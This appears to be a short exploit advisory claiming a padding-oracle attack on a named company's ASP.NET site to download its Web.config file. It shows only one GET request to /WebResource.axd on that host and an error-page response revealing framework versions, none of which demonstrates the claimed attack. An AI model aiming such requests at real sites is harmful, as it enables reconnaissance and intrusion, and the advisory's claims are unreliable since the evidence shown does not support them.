Exploit Title:istikbal Padding Oracle Vulnerability
# Date:10.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: istikbal.com.tr
# Version: ALL
# Tested on: Windows 10-Linux Kali
***************************************************************************************************
This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file.
GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35
Host: www.istikbal.com.tr
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
poc
<!DOCTYPE html>
<html>
<head>
<title>The resource cannot be found.</title>
****** <b> Requested URL: </b>/WebResource.axd<br><br>*********
<hr width=100% size=1 color=silver>
<b>Version Information:</b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0
</font>